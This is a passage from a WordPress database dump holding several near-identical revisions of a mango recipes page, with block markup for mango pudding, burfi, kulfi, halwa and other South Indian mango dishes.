kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:10:55','2022-02-07 11:40:55','',745,'https://mangomitra.in/?p=818',0,'revision','',0),(819,1,'2022-02-07 17:11:39','2022-02-07 11:41:39','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time : 5 minutes</li><li>Cook Time           : 15 minutes</li><li>Total Time            : 20 minutes</li><li>Servings               : 24 pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-kulfi-recipe\">Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:11:39','2022-02-07 11:41:39','',745,'https://mangomitra.in/?p=819',0,'revision','',0),(821,1,'2022-02-07 17:14:11','2022-02-07 11:44:11','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time : 5 minutes</li><li>Cook Time           : 15 minutes</li><li>Total Time            : 20 minutes</li><li>Servings               : 24 pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-kulfi-recipe\">Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>2 Wash and peel mango. Chop them to cubes and add to a blender jar.<br>3 Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>4 Blend on a medium speed until smooth.<br>5 Add chopped pistas. Give a good stir.<br>6 Pour the mixture to the kulfi moulds and refrigerate until set.<br>7 Rub the moulds in between your palm or dip them in a bowl of water.<br>8 Gently loosen and remove mango kulfi.<br>9 Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:14:11','2022-02-07 11:44:11','',745,'https://mangomitra.in/?p=821',0,'revision','',0),(823,1,'2022-02-07 17:24:37','2022-02-07 11:54:37','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tbsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-rasayana\">Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-kulfi-recipe\">Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the 